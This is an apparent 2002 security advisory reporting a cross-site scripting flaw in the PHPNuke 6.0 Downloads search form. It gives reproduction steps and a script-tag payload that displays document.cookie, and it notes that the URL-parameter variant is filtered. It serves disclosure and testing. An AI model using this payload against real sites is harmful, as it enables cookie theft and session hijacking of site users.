XSS bug in PHPNuke 6.0

2002-10-12T00:00:00
ID SECURITYVULNS:DOC:3624
Type securityvulns
Reporter Securityvulns
Modified 2002-10-12T00:00:00

Description

Vulnerable systems: PHPNuke 6.0 & mabey all

Exploit: 1- go to http://[traget]/modules.php?name=Downloads&d_op=search

2- put in form search this code :

<Script>javascript:alert(document.cookie)</Script>

3- click "Search"

(without "*")

you can't use it an URL like this

http://[traget]/modules.php? name=Downloads&d_op=search&query=<Script>javascript:alert(document.cookie) </Script>

it will write "I don't like you..." me 2 :)


Arab Vieruz

thanx